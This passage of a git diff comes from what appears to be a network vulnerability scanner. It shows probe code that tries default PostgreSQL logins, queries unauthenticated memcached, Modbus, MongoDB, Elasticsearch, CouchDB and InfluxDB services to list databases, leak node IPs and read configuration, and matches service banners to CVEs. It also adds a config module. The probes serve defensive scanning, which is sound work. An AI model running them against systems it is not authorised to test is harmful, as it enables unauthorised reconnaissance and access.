severity=Severity.CRITICAL, - title=f"PostgreSQL default credential accepted: {cred_str}", - description=f"MD5 password auth accepted for {cred_str}.", - evidence=f"Auth OK for {cred_str}", - remediation="Change default passwords.", - owasp_id="A07:2021", - cwe_id="CWE-798", - confidence="certain", - )) - findings += self._pg_extract_version_findings(resp) - raw["tested_credentials"] += 1 - sock.close() - except Exception: - continue - - if not findings: - findings.append(Finding( - severity=Severity.INFO, - title="PostgreSQL default credentials rejected", - description=f"Tested 
{raw['tested_credentials']} credential pairs.", - confidence="certain", - )) - - return probe_result(raw_data=raw, findings=findings) - - def _pg_extract_version_findings(self, data): - """Parse ParameterStatus messages after PG auth success for version + CVEs.""" - findings = [] - pos = 0 - while pos < len(data) - 5: - msg_type = data[pos:pos+1] - if msg_type not in (b'R', b'S', b'K', b'Z', b'E', b'N'): - break - msg_len = struct.unpack('!I', data[pos+1:pos+5])[0] - msg_end = pos + 1 + msg_len - if msg_type == b'S' and msg_end <= len(data): - kv = data[pos+5:msg_end] - parts = kv.split(b'\x00') - if len(parts) >= 2: - key = parts[0].decode('utf-8', errors='ignore') - val = parts[1].decode('utf-8', errors='ignore') - if key == 'server_version': - findings.append(Finding( - severity=Severity.LOW, - title=f"PostgreSQL version disclosed: {val}", - description=f"PostgreSQL reports version {val} (via authenticated session).", - evidence=f"server_version parameter: {val}", - remediation="Restrict network access to the PostgreSQL port.", - cwe_id="CWE-200", - confidence="certain", - )) - ver_match = _re.match(r'(\d+\.\d+(?:\.\d+)?)', val) - if ver_match: - findings += check_cves("postgresql", ver_match.group(1)) - break - pos = msg_end - if pos >= len(data): - break - return findings - - def _service_info_memcached(self, target, port): # default port: 11211 - """ - Issue Memcached stats command to detect unauthenticated access. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. 
- """ - findings = [] - raw = {"banner": None} - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(2) - sock.connect((target, port)) - - # Extract version - sock.sendall(b'version\r\n') - ver_data = sock.recv(64).decode("utf-8", errors="replace").strip() - ver_match = _re.match(r'VERSION\s+(\d+(?:\.\d+)+)', ver_data) - if ver_match: - raw["version"] = ver_match.group(1) - findings.append(Finding( - severity=Severity.LOW, - title=f"Memcached version disclosed: {raw['version']}", - description=f"Memcached on {target}:{port} reveals version via VERSION command.", - evidence=f"VERSION {raw['version']}", - remediation="Restrict access to memcached to trusted networks.", - cwe_id="CWE-200", - confidence="certain", - )) - findings += check_cves("memcached", raw["version"]) - - sock.sendall(b'stats\r\n') - data = sock.recv(128) - if data.startswith(b'STAT'): - raw["banner"] = data.decode("utf-8", errors="replace").strip()[:120] - findings.append(Finding( - severity=Severity.HIGH, - title="Memcached stats accessible without authentication", - description=f"Memcached on {target}:{port} responds to stats without authentication, " - "exposing cache metadata and enabling cache poisoning or data exfiltration.", - evidence=f"stats command returned: {raw['banner'][:80]}", - remediation="Bind Memcached to localhost or use SASL authentication; restrict network access.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - else: - raw["banner"] = "Memcached port open" - findings.append(Finding( - severity=Severity.INFO, - title="Memcached port open", - description=f"Memcached port {port} is open on {target} but stats command was not accepted.", - evidence=f"Response: {data[:60].decode('utf-8', errors='replace')}", - confidence="firm", - )) - sock.close() - except Exception as e: - return probe_error(target, port, "Memcached", e) - return probe_result(raw_data=raw, findings=findings) - - - def _service_info_elasticsearch(self, 
target, port): # default port: 9200 - """ - Deep Elasticsearch probe: cluster info, index listing, node IPs, CVE matching. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings, raw = [], {"cluster_name": None, "version": None} - base_url = f"http://{target}" if port == 80 else f"http://{target}:{port}" - - # First check if this is actually Elasticsearch (GET / must return JSON with cluster_name or tagline) - findings += self._es_check_root(base_url, raw) - if not raw["cluster_name"] and not raw.get("tagline"): - # Not Elasticsearch — skip further probing to avoid noise on regular HTTP ports - return None - - findings += self._es_check_indices(base_url, raw) - findings += self._es_check_nodes(base_url, raw) - - if raw["version"]: - findings += check_cves("elasticsearch", raw["version"]) - - if not findings: - findings.append(Finding(Severity.INFO, "Elasticsearch probe clean", "No issues detected.")) - - return probe_result(raw_data=raw, findings=findings) - - def _es_check_root(self, base_url, raw): - """GET / — extract version, cluster name.""" - findings = [] - try: - resp = requests.get(base_url, timeout=3) - if resp.ok: - try: - data = resp.json() - raw["cluster_name"] = data.get("cluster_name") - ver_info = data.get("version", {}) - raw["version"] = ver_info.get("number") if isinstance(ver_info, dict) else None - raw["tagline"] = data.get("tagline") - findings.append(Finding( - severity=Severity.HIGH, - title=f"Elasticsearch cluster metadata exposed", - description=f"Cluster '{raw['cluster_name']}' version {raw['version']} accessible without auth.", - evidence=f"cluster={raw['cluster_name']}, version={raw['version']}", - remediation="Enable X-Pack security or restrict network access.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="certain", - )) - except Exception: - if 'cluster_name' in resp.text: - findings.append(Finding( - 
severity=Severity.HIGH, - title="Elasticsearch cluster metadata exposed", - description=f"Cluster metadata accessible at {base_url}.", - evidence=resp.text[:200], - remediation="Enable authentication.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="firm", - )) - except Exception: - pass - return findings - - def _es_check_indices(self, base_url, raw): - """GET /_cat/indices — list accessible indices.""" - findings = [] - try: - resp = requests.get(f"{base_url}/_cat/indices?v", timeout=3) - if resp.ok and resp.text.strip(): - lines = resp.text.strip().split("\n") - index_count = max(0, len(lines) - 1) # subtract header - raw["index_count"] = index_count - if index_count > 0: - findings.append(Finding( - severity=Severity.HIGH, - title=f"Elasticsearch {index_count} indices accessible", - description=f"{index_count} indices listed without authentication.", - evidence="\n".join(lines[:6]), - remediation="Enable authentication and restrict index access.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="certain", - )) - except Exception: - pass - return findings - - def _es_check_nodes(self, base_url, raw): - """GET /_nodes — extract transport/publish addresses, classify IPs, check JVM.""" - findings = [] - try: - resp = requests.get(f"{base_url}/_nodes", timeout=3) - if resp.ok: - data = resp.json() - nodes = data.get("nodes", {}) - ips = set() - for node in nodes.values(): - for key in ("transport_address", "publish_address", "host"): - val = node.get(key) or "" - ip = val.rsplit(":", 1)[0] if ":" in val else val - if ip and ip not in ("127.0.0.1", "localhost", "0.0.0.0"): - ips.add(ip) - settings = node.get("settings", {}) - if isinstance(settings, dict): - net = settings.get("network", {}) - if isinstance(net, dict): - for k in ("host", "publish_host"): - v = net.get(k) - if v and v not in ("127.0.0.1", "localhost", "0.0.0.0"): - ips.add(v) - - if ips: - import ipaddress as _ipaddress - raw["node_ips"] = list(ips) - public_ips, private_ips = [], 
[] - for ip_str in ips: - try: - is_priv = _ipaddress.ip_address(ip_str).is_private - except (ValueError, TypeError): - is_priv = True # assume private on parse failure - if is_priv: - private_ips.append(ip_str) - else: - public_ips.append(ip_str) - self._emit_metadata("internal_ips", {"ip": ip_str, "source": "es_nodes"}) - - if public_ips: - findings.append(Finding( - severity=Severity.CRITICAL, - title=f"Elasticsearch leaks real public IP: {', '.join(sorted(public_ips)[:3])}", - description="The _nodes endpoint exposes public IP addresses, potentially revealing " - "the real infrastructure behind NAT/VPN/honeypot.", - evidence=f"Public IPs: {', '.join(sorted(public_ips))}", - remediation="Restrict /_nodes endpoint; configure network.publish_host to a safe value.", - owasp_id="A01:2021", - cwe_id="CWE-200", - confidence="certain", - )) - if private_ips: - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"Elasticsearch node internal IPs disclosed ({len(private_ips)})", - description=f"Node API exposes internal IPs: {', '.join(sorted(private_ips)[:5])}", - evidence=f"IPs: {', '.join(sorted(private_ips)[:10])}", - remediation="Restrict /_nodes endpoint access.", - owasp_id="A01:2021", - cwe_id="CWE-200", - confidence="certain", - )) - - # --- JVM version extraction --- - for node in nodes.values(): - jvm = node.get("jvm", {}) - if isinstance(jvm, dict): - jvm_version = jvm.get("version") - if jvm_version: - raw["jvm_version"] = jvm_version - try: - if jvm_version.startswith("1."): - # Java 1.x format: 1.7.0_55 → major=7, 1.8.0_345 → major=8 - major = int(jvm_version.split(".")[1]) - else: - # Modern format: 17.0.5 → major=17 - major = int(str(jvm_version).split(".")[0]) - if major <= 8: - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"Elasticsearch running on EOL JVM: Java {jvm_version}", - description=f"Java {jvm_version} is end-of-life and no longer receives security patches.", - evidence=f"jvm.version={jvm_version}", - 
remediation="Upgrade to a supported Java LTS release (17+).", - owasp_id="A06:2021", - cwe_id="CWE-1104", - confidence="certain", - )) - except (ValueError, IndexError): - pass - break # one node is enough - except Exception: - pass - return findings - - - def _service_info_modbus(self, target, port): # default port: 502 - """ - Send Modbus device identification request to detect exposed PLCs. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings = [] - raw = {"banner": None} - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - request = b'\x00\x01\x00\x00\x00\x06\x01\x2b\x0e\x01\x00' - sock.sendall(request) - data = sock.recv(256) - if data: - readable = ''.join(chr(b) if 32 <= b < 127 else '.' for b in data) - raw["banner"] = readable.strip()[:120] - findings.append(Finding( - severity=Severity.CRITICAL, - title="Modbus device responded to identification request", - description=f"Industrial control system on {target}:{port} is accessible without authentication. " - "Modbus has no built-in security — any network access means full device control.", - evidence=f"Device ID response: {readable.strip()[:80]}", - remediation="Isolate Modbus devices on a dedicated OT network; deploy a Modbus-aware firewall.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="certain", - )) - sock.close() - except Exception as e: - return probe_error(target, port, "Modbus", e) - return probe_result(raw_data=raw, findings=findings) - - - def _service_info_mongodb(self, target, port): # default port: 27017 - """ - Attempt MongoDB isMaster + buildInfo to detect unauthenticated access - and extract the server version for CVE matching. 
- """ - findings = [] - raw = {"banner": None, "version": None} - try: - # --- Pass 1: isMaster --- - is_master = False - data = self._mongodb_query(target, port, b'isMaster') - if data and (b'ismaster' in data or b'isMaster' in data): - is_master = True - - if is_master: - raw["banner"] = "MongoDB isMaster response" - findings.append(Finding( - severity=Severity.CRITICAL, - title="MongoDB unauthenticated access (isMaster responded)", - description=f"MongoDB on {target}:{port} accepts commands without authentication, " - "allowing full database read/write access.", - evidence="isMaster command succeeded without credentials.", - remediation="Enable MongoDB authentication (--auth) and bind to localhost or trusted networks.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - - # --- Pass 2: buildInfo (for version) --- - build_data = self._mongodb_query(target, port, b'buildInfo') - mongo_version = self._mongodb_extract_bson_string(build_data, b'version') - if mongo_version: - raw["version"] = mongo_version - findings.append(Finding( - severity=Severity.LOW, - title=f"MongoDB version disclosed: {mongo_version}", - description=f"MongoDB on {target}:{port} reports version {mongo_version}.", - evidence=f"buildInfo version: {mongo_version}", - remediation="Restrict network access to the MongoDB port.", - cwe_id="CWE-200", - confidence="certain", - )) - ver_match = _re.match(r'(\d+\.\d+(?:\.\d+)?)', mongo_version) - if ver_match: - for f in check_cves("mongodb", ver_match.group(1)): - findings.append(f) - - except Exception as e: - return probe_error(target, port, "MongoDB", e) - return probe_result(raw_data=raw, findings=findings) - - @staticmethod - def _mongodb_query(target, port, command_name): - """Send a MongoDB OP_QUERY command and return the raw response bytes.""" - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - # Build BSON: {: 1} - field = b'\x10' + command_name + b'\x00' + 
struct.pack(' len(data): - return None - str_len = struct.unpack(' len(data): - return None - return data[str_start+4:str_start+4+str_len-1].decode('utf-8', errors='ignore') - - - - # ── CouchDB ────────────────────────────────────────────────────── - - def _service_info_couchdb(self, target, port): # default port: 5984 - """ - Probe Apache CouchDB HTTP API for unauthenticated access, admin panel, - database listing, and version-based CVE matching. - """ - findings, raw = [], {"version": None} - base_url = f"http://{target}:{port}" - - # 1. Root endpoint — identifies CouchDB and extracts version - try: - resp = requests.get(base_url, timeout=3) - if not resp.ok: - return None - data = resp.json() - if "couchdb" not in str(data).lower(): - return None # Not CouchDB - raw["version"] = data.get("version") - raw["vendor"] = data.get("vendor", {}).get("name") if isinstance(data.get("vendor"), dict) else None - except Exception: - return None - - if raw["version"]: - findings.append(Finding( - severity=Severity.LOW, - title=f"CouchDB version disclosed: {raw['version']}", - description=f"CouchDB on {target}:{port} reports version {raw['version']}.", - evidence=f"GET / → version={raw['version']}", - remediation="Restrict network access to the CouchDB port.", - cwe_id="CWE-200", - confidence="certain", - )) - ver_match = _re.match(r'(\d+\.\d+(?:\.\d+)?)', raw["version"]) - if ver_match: - findings += check_cves("couchdb", ver_match.group(1)) - - # 2. Database listing — unauthenticated access to /_all_dbs - try: - resp = requests.get(f"{base_url}/_all_dbs", timeout=3) - if resp.ok: - dbs = resp.json() - if isinstance(dbs, list): - raw["databases"] = dbs - user_dbs = [d for d in dbs if not d.startswith("_")] - findings.append(Finding( - severity=Severity.CRITICAL if user_dbs else Severity.HIGH, - title=f"CouchDB unauthenticated database listing ({len(dbs)} databases)", - description=f"/_all_dbs accessible without credentials. 
" - f"{'User databases exposed: ' + ', '.join(user_dbs[:5]) if user_dbs else 'Only system databases found.'}", - evidence=f"Databases: {', '.join(dbs[:10])}" + (f"... (+{len(dbs)-10} more)" if len(dbs) > 10 else ""), - remediation="Enable CouchDB authentication via [admins] section in local.ini.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="certain", - )) - except Exception: - pass - - # 3. Admin panel (Fauxton) accessibility - try: - resp = requests.get(f"{base_url}/_utils/", timeout=3, allow_redirects=True) - if resp.ok and ("fauxton" in resp.text.lower() or "couchdb" in resp.text.lower()): - findings.append(Finding( - severity=Severity.HIGH, - title="CouchDB admin panel (Fauxton) accessible", - description=f"/_utils/ on {target}:{port} serves the admin web interface.", - evidence=f"GET /_utils/ returned {resp.status_code}, content-length={len(resp.text)}", - remediation="Restrict access to /_utils via reverse proxy or bind to localhost.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="certain", - )) - except Exception: - pass - - # 4. 
Config endpoint — critical if accessible - try: - resp = requests.get(f"{base_url}/_node/_local/_config", timeout=3) - if resp.ok and resp.text.startswith("{"): - findings.append(Finding( - severity=Severity.CRITICAL, - title="CouchDB configuration exposed without authentication", - description="/_node/_local/_config returns full server configuration including credentials.", - evidence=f"GET /_node/_local/_config returned {resp.status_code}", - remediation="Enable admin authentication immediately.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="certain", - )) - except Exception: - pass - - if not findings: - findings.append(Finding(Severity.INFO, "CouchDB probe clean", "No issues detected.")) - return probe_result(raw_data=raw, findings=findings) - - # ── InfluxDB ──────────────────────────────────────────────────── - - def _service_info_influxdb(self, target, port): # default port: 8086 - """ - Probe InfluxDB HTTP API for version disclosure, unauthenticated access, - and database listing. - """ - findings, raw = [], {"version": None} - base_url = f"http://{target}:{port}" - - # 1. Ping — extract version from X-Influxdb-Version header - try: - resp = requests.get(f"{base_url}/ping", timeout=3) - version = resp.headers.get("X-Influxdb-Version") - if not version: - return None # Not InfluxDB - raw["version"] = version - findings.append(Finding( - severity=Severity.LOW, - title=f"InfluxDB version disclosed: {version}", - description=f"InfluxDB on {target}:{port} reports version {version}.", - evidence=f"X-Influxdb-Version: {version}", - remediation="Restrict network access to the InfluxDB port.", - cwe_id="CWE-200", - confidence="certain", - )) - ver_match = _re.match(r'(\d+\.\d+(?:\.\d+)?)', version) - if ver_match: - findings += check_cves("influxdb", ver_match.group(1)) - except Exception: - return None - - # 2. 
Unauthenticated database listing - try: - resp = requests.get(f"{base_url}/query", params={"q": "SHOW DATABASES"}, timeout=3) - if resp.ok: - data = resp.json() - results = data.get("results", []) - if results and not results[0].get("error"): - series = results[0].get("series", []) - db_names = [] - for s in series: - for row in s.get("values", []): - if row: - db_names.append(row[0]) - raw["databases"] = db_names - user_dbs = [d for d in db_names if d not in ("_internal",)] - findings.append(Finding( - severity=Severity.CRITICAL if user_dbs else Severity.HIGH, - title=f"InfluxDB unauthenticated access ({len(db_names)} databases)", - description=f"SHOW DATABASES succeeded without credentials. " - f"{'User databases: ' + ', '.join(user_dbs[:5]) if user_dbs else 'Only internal databases found.'}", - evidence=f"Databases: {', '.join(db_names[:10])}", - remediation="Enable InfluxDB authentication in the configuration ([http] auth-enabled = true).", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - elif results and results[0].get("error"): - # Auth required — good - findings.append(Finding( - severity=Severity.INFO, - title="InfluxDB authentication enforced", - description="SHOW DATABASES rejected without credentials.", - evidence=f"Error: {results[0]['error'][:80]}", - confidence="certain", - )) - except Exception: - pass - - # 3. 
Debug endpoint exposure - try: - resp = requests.get(f"{base_url}/debug/vars", timeout=3) - if resp.ok and "memstats" in resp.text: - findings.append(Finding( - severity=Severity.MEDIUM, - title="InfluxDB debug endpoint exposed (/debug/vars)", - description="Go runtime debug variables accessible, leaking memory stats and internal state.", - evidence=f"GET /debug/vars returned {resp.status_code}", - remediation="Disable or restrict access to debug endpoints.", - owasp_id="A05:2021", - cwe_id="CWE-200", - confidence="certain", - )) - except Exception: - pass - - if not findings: - findings.append(Finding(Severity.INFO, "InfluxDB probe clean", "No issues detected.")) - return probe_result(raw_data=raw, findings=findings) - - # Product patterns for generic banner version extraction. - # Maps regex → CVE DB product name. Each regex must have a named group 'ver'. - _GENERIC_BANNER_PATTERNS = [ - (_re.compile(r'OpenSSH[_\s](?P\d+\.\d+(?:\.\d+)?)', _re.I), "openssh"), - (_re.compile(r'Apache[/ ](?P\d+\.\d+(?:\.\d+)?)', _re.I), "apache"), - (_re.compile(r'nginx[/ ](?P\d+\.\d+(?:\.\d+)?)', _re.I), "nginx"), - (_re.compile(r'Exim\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "exim"), - (_re.compile(r'Postfix[/ ]?(?:.*?smtpd)?\s*(?P\d+\.\d+(?:\.\d+)?)', _re.I), "postfix"), - (_re.compile(r'ProFTPD\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "proftpd"), - (_re.compile(r'vsftpd\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "vsftpd"), - (_re.compile(r'Redis[/ ](?:server\s+)?v?(?P\d+\.\d+(?:\.\d+)?)', _re.I), "redis"), - (_re.compile(r'Samba\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "samba"), - (_re.compile(r'Asterisk\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "asterisk"), - (_re.compile(r'MySQL[/ ](?P\d+\.\d+(?:\.\d+)?)', _re.I), "mysql"), - (_re.compile(r'PostgreSQL\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "postgresql"), - (_re.compile(r'MongoDB\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "mongodb"), - (_re.compile(r'Elasticsearch[/ ](?P\d+\.\d+(?:\.\d+)?)', _re.I), "elasticsearch"), - (_re.compile(r'memcached\s+(?P\d+\.\d+(?:\.\d+)?)', 
_re.I), "memcached"), - (_re.compile(r'TightVNC[/ ](?P\d+\.\d+(?:\.\d+)?)', _re.I), "tightvnc"), - ] - - def _service_info_generic(self, target, port): - """ - Attempt a generic TCP banner grab for uncovered ports. - - Performs three checks on the banner: - 1. Version disclosure — flags any product/version string as info leak. - 2. CVE matching — runs extracted versions against the CVE database. - 3. Unauthenticated data exposure — flags services that send data - without any client request (potential auth bypass). - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings = [] - raw = {"banner": None} - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(2) - sock.connect((target, port)) - raw_bytes = sock.recv(512) - sock.close() - if not raw_bytes: - return None - except Exception as e: - return probe_error(target, port, "generic", e) - - # --- Protocol fingerprinting: detect known services on non-standard ports --- - reclassified = self._generic_fingerprint_protocol(raw_bytes, target, port) - if reclassified is not None: - return reclassified - - # --- Standard banner analysis for truly unknown services --- - data = raw_bytes.decode('utf-8', errors='ignore') - banner = ''.join(ch if 32 <= ord(ch) < 127 else '.' for ch in data) - readable = banner.strip().replace('.', '') - if not readable: - return None - raw["banner"] = banner.strip() - banner_text = raw["banner"] - - # --- 1. Version extraction + CVE check --- - for pattern, product in self._GENERIC_BANNER_PATTERNS: - m = pattern.search(banner_text) - if m: - version = m.group("ver") - raw["product"] = product - raw["version"] = version - findings.append(Finding( - severity=Severity.LOW, - title=f"Service version disclosed: {product} {version}", - description=f"Banner on {target}:{port} reveals {product} {version}. 
" - "Version disclosure aids attackers in targeting known vulnerabilities.", - evidence=f"Banner: {banner_text[:80]}", - remediation="Suppress or genericize the service banner.", - cwe_id="CWE-200", - confidence="certain", - )) - findings += check_cves(product, version) - break # First match wins - - return probe_result(raw_data=raw, findings=findings) - - # Protocol signatures for reclassifying services on non-standard ports. - # Each entry: (check_function, protocol_name, probe_method_name) - # Check functions receive raw bytes and return True if matched. - @staticmethod - def _is_redis_banner(data): - """Redis RESP: starts with +, -, :, $, or * (protocol type bytes).""" - return len(data) > 0 and data[0:1] in (b'+', b'-', b'$', b'*', b':') - - @staticmethod - def _is_ftp_banner(data): - """FTP: 220 greeting.""" - return data[:4] in (b'220 ', b'220-') - - @staticmethod - def _is_smtp_banner(data): - """SMTP: 220 greeting with SMTP/ESMTP keyword.""" - text = data[:200].decode('utf-8', errors='ignore').upper() - return text.startswith('220') and ('SMTP' in text or 'ESMTP' in text) - - @staticmethod - def _is_mysql_handshake(data): - """MySQL: 3-byte length + seq + protocol version 0x0a.""" - if len(data) > 4: - payload = data[4:] - return payload[0:1] == b'\x0a' - return False - - @staticmethod - def _is_rsync_banner(data): - """Rsync: @RSYNCD: version.""" - return data.startswith(b'@RSYNCD:') - - @staticmethod - def _is_telnet_banner(data): - """Telnet: IAC (0xFF) followed by WILL/WONT/DO/DONT.""" - return len(data) >= 2 and data[0] == 0xFF and data[1] in (0xFB, 0xFC, 0xFD, 0xFE) - - _PROTOCOL_SIGNATURES = None # lazy init to avoid forward reference issues - - def _generic_fingerprint_protocol(self, raw_bytes, target, port): - """Try to identify the protocol from raw banner bytes. - - If a known protocol is detected, reclassifies the port and runs the - appropriate specialized probe directly. 
- - Returns - ------- - dict or None - Probe result from the specialized probe, or None if no match. - """ - signatures = [ - (self._is_redis_banner, "redis", "_service_info_redis"), - (self._is_ftp_banner, "ftp", "_service_info_ftp"), - (self._is_smtp_banner, "smtp", "_service_info_smtp"), - (self._is_mysql_handshake, "mysql", "_service_info_mysql"), - (self._is_rsync_banner, "rsync", "_service_info_rsync"), - (self._is_telnet_banner, "telnet", "_service_info_telnet"), - ] - - for check_fn, proto, method_name in signatures: - try: - if check_fn(raw_bytes): - # Reclassify port protocol for future reference - port_protocols = self.state.get("port_protocols", {}) - old_proto = port_protocols.get(port, "unknown") - port_protocols[port] = proto - self.P(f"Protocol reclassified: port {port} {old_proto} → {proto} (banner fingerprint)") - - # Run the specialized probe directly - probe_fn = getattr(self, method_name, None) - if probe_fn: - return probe_fn(target, port) - except Exception: - continue - return None diff --git a/extensions/business/cybersec/red_mesh/services/__init__.py b/extensions/business/cybersec/red_mesh/services/__init__.py new file mode 100644 index 00000000..29662998 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/services/__init__.py @@ -0,0 +1,111 @@ +from .config import ( + get_attestation_config, + get_graybox_budgets_config, + get_llm_agent_config, + resolve_config_block, +) +from .control import ( + purge_job, + stop_and_delete_job, + stop_monitoring, +) +from .finalization import maybe_finalize_pass +from .launch import launch_local_jobs +from .launch_api import ( + announce_launch, + build_network_workers, + build_webapp_workers, + launch_network_scan, + launch_test, + launch_webapp_scan, + normalize_common_launch_options, + parse_exceptions, + resolve_active_peers, + resolve_enabled_features, + validation_error, +) +from .query import ( + get_job_analysis, + get_job_archive, + get_job_data, + get_job_progress, + list_local_jobs, + 
list_network_jobs, +) +from .reconciliation import ( + get_distributed_job_reconciliation_config, + reconcile_job_workers, +) +from .secrets import ( + R1fsSecretStore, + collect_secret_refs_from_job_config, + persist_job_config_with_secrets, + resolve_job_config_secrets, +) +from .scan_strategy import ( + ScanStrategy, + coerce_scan_type, + get_scan_strategy, + iter_scan_strategies, +) +from .state_machine import ( + INTERMEDIATE_JOB_STATUSES, + TERMINAL_JOB_STATUSES, + can_transition_job_status, + is_intermediate_job_status, + is_terminal_job_status, + set_job_status, +) +from .triage import ( + get_job_archive_with_triage, + get_job_triage, + update_finding_triage, +) + +__all__ = [ + "INTERMEDIATE_JOB_STATUSES", + "ScanStrategy", + "TERMINAL_JOB_STATUSES", + "can_transition_job_status", + "coerce_scan_type", + "get_attestation_config", + "get_graybox_budgets_config", + "get_llm_agent_config", + "resolve_config_block", + "announce_launch", + "build_network_workers", + "build_webapp_workers", + "get_scan_strategy", + "get_job_analysis", + "get_job_archive", + "get_job_data", + "get_job_progress", + "is_intermediate_job_status", + "is_terminal_job_status", + "iter_scan_strategies", + "launch_local_jobs", + "launch_network_scan", + "launch_test", + "launch_webapp_scan", + "list_local_jobs", + "list_network_jobs", + "maybe_finalize_pass", + "normalize_common_launch_options", + "parse_exceptions", + "persist_job_config_with_secrets", + "purge_job", + "R1fsSecretStore", + "resolve_job_config_secrets", + "collect_secret_refs_from_job_config", + "resolve_active_peers", + "resolve_enabled_features", + "get_distributed_job_reconciliation_config", + "reconcile_job_workers", + "set_job_status", + "stop_and_delete_job", + "stop_monitoring", + "get_job_archive_with_triage", + "get_job_triage", + "update_finding_triage", + "validation_error", +] diff --git a/extensions/business/cybersec/red_mesh/services/config.py b/extensions/business/cybersec/red_mesh/services/config.py new 
# ---- services/config.py ----

def _config_attr_name(block_name):
    """Map a config block name (e.g. "LLM_AGENT") to its plugin attribute ("cfg_llm_agent")."""
    return f"cfg_{block_name.lower()}"


def _coerce_float(value, default, minimum, exclusive=False):
    """Coerce *value* to float, falling back to *default* when conversion fails
    or the bound is violated.

    When *exclusive* is True the result must be strictly greater than *minimum*,
    otherwise greater-or-equal.
    """
    try:
        result = float(value)
    except (TypeError, ValueError):
        return default
    if exclusive:
        return result if result > minimum else default
    return result if result >= minimum else default


def _coerce_int(value, default, minimum):
    """Coerce *value* to int, falling back to *default* when conversion fails
    or the result is below *minimum*."""
    try:
        result = int(value)
    except (TypeError, ValueError):
        return default
    return result if result >= minimum else default


def resolve_config_block(owner, block_name, defaults, normalizer=None):
    """Resolve one shallow nested config block with partial override merge.

    Override lookup order: ``owner.cfg_<block_name.lower()>``, then
    ``owner.config_data[block_name]``, then ``owner.CONFIG[block_name]``.
    The first dict found is shallow-merged on top of *defaults*.  An optional
    ``normalizer(merged, defaults)`` may post-process the merged dict; its
    result is used only when it returns a dict.
    """
    merged = dict(defaults or {})
    override = getattr(owner, _config_attr_name(block_name), None)
    if override is None:
        config_data = getattr(owner, "config_data", None)
        if isinstance(config_data, dict):
            override = config_data.get(block_name)
    if override is None:
        config = getattr(owner, "CONFIG", None)
        if isinstance(config, dict):
            override = config.get(block_name)
    if isinstance(override, dict):
        merged.update(override)

    if callable(normalizer):
        # Pass copies so a normalizer cannot mutate our merged/defaults dicts.
        normalized = normalizer(dict(merged), dict(defaults or {}))
        if isinstance(normalized, dict):
            return normalized
    return merged


# Defaults for each supported config block; user overrides are merged on top.
DEFAULT_LLM_AGENT_CONFIG = {
    "ENABLED": False,
    "TIMEOUT": 120.0,
    "AUTO_ANALYSIS_TYPE": "security_assessment",
}

DEFAULT_ATTESTATION_CONFIG = {
    "ENABLED": True,
    "PRIVATE_KEY": "",
    "MIN_SECONDS_BETWEEN_SUBMITS": 86400.0,
    "RETRIES": 2,
}

DEFAULT_GRAYBOX_BUDGETS_CONFIG = {
    "AUTH_ATTEMPTS": 10,
    "ROUTE_DISCOVERY": 100,
    "STATEFUL_ACTIONS": 1,
}


def get_llm_agent_config(owner):
    """Return normalized LLM agent integration config.

    TIMEOUT is coerced to a strictly positive float; malformed or
    non-positive overrides fall back to the default.
    """
    def _normalize(merged, defaults):
        analysis_type = str(
            merged.get("AUTO_ANALYSIS_TYPE") or defaults["AUTO_ANALYSIS_TYPE"]
        ).strip() or defaults["AUTO_ANALYSIS_TYPE"]
        return {
            "ENABLED": bool(merged.get("ENABLED", defaults["ENABLED"])),
            "TIMEOUT": _coerce_float(
                merged.get("TIMEOUT", defaults["TIMEOUT"]),
                defaults["TIMEOUT"], 0, exclusive=True,
            ),
            "AUTO_ANALYSIS_TYPE": analysis_type,
        }

    return resolve_config_block(
        owner,
        "LLM_AGENT",
        DEFAULT_LLM_AGENT_CONFIG,
        normalizer=_normalize,
    )


def get_attestation_config(owner):
    """Return normalized attestation config.

    MIN_SECONDS_BETWEEN_SUBMITS is a non-negative float and RETRIES a
    non-negative int; invalid overrides fall back to the defaults.
    """
    def _normalize(merged, defaults):
        return {
            "ENABLED": bool(merged.get("ENABLED", defaults["ENABLED"])),
            "PRIVATE_KEY": str(merged.get("PRIVATE_KEY") or defaults["PRIVATE_KEY"]),
            "MIN_SECONDS_BETWEEN_SUBMITS": _coerce_float(
                merged.get("MIN_SECONDS_BETWEEN_SUBMITS", defaults["MIN_SECONDS_BETWEEN_SUBMITS"]),
                defaults["MIN_SECONDS_BETWEEN_SUBMITS"], 0,
            ),
            "RETRIES": _coerce_int(
                merged.get("RETRIES", defaults["RETRIES"]),
                defaults["RETRIES"], 0,
            ),
        }

    return resolve_config_block(
        owner,
        "ATTESTATION",
        DEFAULT_ATTESTATION_CONFIG,
        normalizer=_normalize,
    )


def get_graybox_budgets_config(owner):
    """Return normalized graybox execution budgets.

